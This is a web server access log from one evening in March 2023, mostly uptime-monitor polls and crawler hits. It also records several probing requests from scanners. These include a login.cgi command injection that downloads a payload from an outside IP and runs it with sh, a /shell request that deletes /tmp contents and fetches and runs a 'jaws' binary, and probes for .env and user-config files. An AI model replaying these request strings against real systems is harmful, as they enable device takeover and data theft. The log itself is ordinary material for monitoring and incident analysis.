212.91.246.72 - - [01/Mar/2023:19:20:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
60.225.64.129 - - [01/Mar/2023:19:21:00 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.116.115.169/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Mar/2023:19:21:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:19:22:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.150.128.61 - - [01/Mar/2023:19:22:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Mar/2023:19:23:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:19:24:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:19:25:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:19:26:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:19:27:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [01/Mar/2023:19:28:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Mar/2023:19:28:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:19:29:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:19:30:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:19:31:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:19:32:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:19:33:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:19:34:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:19:35:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:19:36:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:19:37:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:19:38:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:19:39:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
206.189.128.152 - - [01/Mar/2023:19:40:14 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
206.189.128.152 - - [01/Mar/2023:19:40:14 +0100] "GET /system_api.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
206.189.128.152 - - [01/Mar/2023:19:40:15 +0100] "GET /c/version.js HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
206.189.128.152 - - [01/Mar/2023:19:40:16 +0100] "GET /streaming/clients_live.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
206.189.128.152 - - [01/Mar/2023:19:40:16 +0100] "GET /stalker_portal/c/version.js HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
206.189.128.152 - - [01/Mar/2023:19:40:17 +0100] "GET /stream/live.php HTTP/1.1" 404 320 "-" "Roku/DVP-9.10 (289.10E04111A)"
206.189.128.152 - - [01/Mar/2023:19:40:18 +0100] "GET /flu/403.html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
206.189.128.152 - - [01/Mar/2023:19:40:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
60.225.64.129 - - [01/Mar/2023:19:40:24 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.116.115.169/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Mar/2023:19:40:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.66.66.112 - - [01/Mar/2023:19:40:49 +0100] "\x03" 501 316 "-" "-"
201.171.101.208 - - [01/Mar/2023:19:41:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Mar/2023:19:41:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.244.50.172 - - [01/Mar/2023:19:42:17 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [01/Mar/2023:19:42:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:19:43:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:19:44:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.244.50.172 - - [01/Mar/2023:19:44:39 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
80.66.66.112 - - [01/Mar/2023:19:44:43 +0100] "\x03" 501 316 "-" "-"
212.91.246.72 - - [01/Mar/2023:19:45:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
60.2.120.26 - - [01/Mar/2023:19:45:32 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+137.175.17.190/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
212.91.246.72 - - [01/Mar/2023:19:46:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.177.242 - - [01/Mar/2023:19:46:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
109.237.98.226 - - [01/Mar/2023:19:47:16 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.98.226 - - [01/Mar/2023:19:47:16 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
212.91.246.72 - - [01/Mar/2023:19:47:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.177.242 - - [01/Mar/2023:19:48:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [01/Mar/2023:19:48:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.158.37.156 - - [01/Mar/2023:19:48:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
143.244.50.172 - - [01/Mar/2023:19:48:49 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
51.158.37.156 - - [01/Mar/2023:19:48:57 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
143.244.50.172 - - [01/Mar/2023:19:49:08 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [01/Mar/2023:19:49:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.244.50.172 - - [01/Mar/2023:19:50:04 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
193.32.162.159 - - [01/Mar/2023:19:50:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Mar/2023:19:50:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:19:51:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.177.242 - - [01/Mar/2023:19:51:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [01/Mar/2023:19:52:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.177.242 - - [01/Mar/2023:19:52:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [01/Mar/2023:19:53:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:19:54:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:19:55:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:19:56:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:19:57:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:19:58:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:19:59:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.244.50.172 - - [01/Mar/2023:19:59:47 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [01/Mar/2023:20:00:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:01:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.177.242 - - [01/Mar/2023:20:01:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [01/Mar/2023:20:02:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [01/Mar/2023:20:02:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
143.244.50.172 - - [01/Mar/2023:20:03:21 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [01/Mar/2023:20:03:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.236.176.195 - - [01/Mar/2023:20:03:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
104.244.79.14 - - [01/Mar/2023:20:03:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0"
14.102.17.222 - - [01/Mar/2023:20:04:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Mar/2023:20:04:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.244.50.172 - - [01/Mar/2023:20:05:20 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [01/Mar/2023:20:05:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.177.242 - - [01/Mar/2023:20:05:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [01/Mar/2023:20:06:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.177.242 - - [01/Mar/2023:20:07:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [01/Mar/2023:20:07:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:08:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.81.17.9 - - [01/Mar/2023:20:08:44 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.116.115.169/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
143.244.50.172 - - [01/Mar/2023:20:08:55 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [01/Mar/2023:20:09:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.177.242 - - [01/Mar/2023:20:09:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
143.244.50.172 - - [01/Mar/2023:20:09:36 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [01/Mar/2023:20:10:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.32 - - [01/Mar/2023:20:11:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
183.136.225.32 - - [01/Mar/2023:20:11:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [01/Mar/2023:20:11:15 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [01/Mar/2023:20:11:15 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
212.91.246.72 - - [01/Mar/2023:20:11:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:12:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:13:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:14:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:15:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:16:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.237.98.226 - - [01/Mar/2023:20:16:59 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.98.226 - - [01/Mar/2023:20:16:59 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
212.91.246.72 - - [01/Mar/2023:20:17:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.177.242 - - [01/Mar/2023:20:17:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [01/Mar/2023:20:18:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [01/Mar/2023:20:18:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.32.162.159 - - [01/Mar/2023:20:19:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Mar/2023:20:19:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:20:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:21:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:22:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:23:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:24:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [01/Mar/2023:20:25:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Mar/2023:20:25:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:26:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:27:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:28:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:29:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:30:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:31:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [01/Mar/2023:20:31:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Mar/2023:20:32:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:33:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [01/Mar/2023:20:33:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Mar/2023:20:34:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:35:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:36:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:37:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:38:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:39:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:40:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
62.138.2.160 - - [01/Mar/2023:20:41:10 +0100] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
62.138.2.160 - - [01/Mar/2023:20:41:11 +0100] "GET /sitemap.xml HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
62.138.2.160 - - [01/Mar/2023:20:41:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
212.91.246.72 - - [01/Mar/2023:20:41:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:42:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:43:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:44:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
130.211.54.158 - - [01/Mar/2023:20:44:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
212.91.246.72 - - [01/Mar/2023:20:45:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.76.96.55 - - [01/Mar/2023:20:45:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
212.91.246.72 - - [01/Mar/2023:20:46:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:47:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:48:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:49:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:50:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:51:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
